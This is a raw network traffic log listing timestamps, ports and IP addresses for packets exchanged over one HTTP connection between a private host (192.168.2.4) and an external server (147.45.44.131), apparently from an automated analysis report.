Jan 1, 2025 08:54:03.016568899 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.016578913 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.016582966 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.016590118 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.016601086 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.016607046 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.016613007 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.016627073 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.016647100 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.016879082 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.016890049 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.016899109 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.016910076 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.016920090 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.016925097 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.016953945 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.016974926 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.019342899 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.019354105 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.019362926 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.019392967 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.019397020 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.019435883 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.019474030 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.019486904 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.019498110 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.019507885 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.019521952 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.019543886 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.019612074 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.019623041 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.019633055 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.019644022 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.019654036 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.019675016 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.019737959 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.019748926 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.019785881 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.019885063 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.019895077 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.019906044 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.019915104 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.019929886 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.019949913 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.019956112 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.019967079 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.019977093 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.019987106 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.019996881 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.020013094 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.020045996 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.020143986 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.020155907 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.020167112 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.020190954 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.020207882 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.020209074 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.020221949 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.020251036 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.020287037 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.020298004 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.020308971 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.020348072 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.020358086 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.020366907 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.020379066 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.020390034 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.020392895 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.020416021 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.020436049 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.020658016 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.020668983 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.020678997 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.020689011 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.020699978 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.020704985 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.020710945 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.020721912 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.020731926 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.020735979 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.020756006 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.020775080 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.104832888 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.104857922 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.104866982 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.104891062 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.104902029 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.104960918 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.105010033 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.105017900 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.105029106 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.105043888 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.105068922 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.105082989 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.105134010 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.105151892 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.105163097 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.105186939 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.105290890 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.105300903 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.105310917 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.105321884 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.105330944 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.105330944 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.105346918 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.105434895 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.105447054 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.105479002 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.105496883 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.105504036 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.105515957 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.105528116 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.105544090 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.105551958 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.105592966 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.105740070 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.105751038 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.105761051 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.105783939 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.105884075 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.105894089 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.105905056 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.105914116 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.105922937 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.105942965 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.105951071 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.105962992 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.105973005 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.105983019 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.105993032 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.106004000 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.106004000 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.106029034 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.106389046 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.106400013 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.106434107 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.106549978 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.106560946 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.106570005 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.106580019 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.106585979 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.106595993 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.106606007 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.106611967 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.106616974 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.106627941 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.106638908 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.106642962 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.106653929 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.106658936 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.106666088 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.106674910 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.106677055 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.106687069 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.106697083 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.106703997 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.106708050 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.106719971 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.106726885 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.106730938 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.106740952 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.106754065 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.106771946 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.107424021 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.107435942 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.107445955 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.107455969 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.107465982 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.107475996 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.107484102 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.107486010 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.107497931 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.107507944 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.107507944 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.107520103 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.107523918 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.107534885 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.107544899 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.107554913 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.107564926 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.107566118 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.107575893 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.107585907 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.107592106 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.107595921 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.107615948 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.107633114 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.110275984 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.110300064 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.110308886 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.110358953 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.110359907 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.110371113 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.110395908 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.110457897 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.110467911 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.110486031 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.110503912 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.110537052 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.110543013 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.110555887 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.110567093 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.110577106 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.110590935 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.110632896 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.110645056 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.110697985 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.110707998 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.110718012 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.110728025 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.110743999 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.110770941 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.110941887 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.110953093 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.110963106 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.110972881 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.110981941 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.110991955 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.110992908 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.111031055 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.111042023 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.111053944 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.111056089 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.111066103 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.111076117 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.111083031 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.111087084 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.111119032 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.111136913 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.111222982 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.111232996 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.111243963 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.111253977 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.111270905 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.111301899 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.111382008 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.111392021 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.111399889 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.111411095 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.111421108 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.111433029 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.111454964 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.111510992 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.111521959 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.111532927 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.111542940 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.111552954 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.111555099 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.111563921 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.111573935 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.111597061 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.111748934 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.111759901 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.111768961 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.111784935 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.111793995 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.111795902 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.111814022 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.111850977 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.195954084 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.195996046 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.196007013 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.196017981 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.196088076 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.196098089 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.196104050 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.196115971 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.196232080 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.196232080 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.196280003 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.196289062 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.196321964 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.196356058 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.196367979 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.196378946 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.196422100 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.196510077 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.196523905 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.196535110 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.196544886 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.196554899 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.196554899 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.196567059 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.196577072 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.196599960 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.196628094 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.196814060 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.196824074 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.196834087 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.196844101 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.196858883 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.196868896 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.196868896 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.196891069 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.196903944 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.197019100 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.197030067 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.197040081 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.197050095 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.197072983 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.197087049 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.197196960 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.197273970 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.197284937 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.197293997 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.197304964 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.197314024 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.197321892 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.197324038 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.197338104 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.197348118 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.197352886 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.197372913 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.197730064 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.197741032 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.197751999 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.197763920 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.197777987 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.197777987 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.197788954 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.197793961 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.197798967 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.197805882 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.197807074 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.197854996 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.198041916 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.198054075 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.198062897 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.198074102 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.198084116 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.198091030 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.198108912 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.198224068 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.198235035 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.198244095 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.198250055 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.198261976 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.198271990 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.198281050 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.198290110 CET	80	49730	147.45.44.131	192.168.2.4
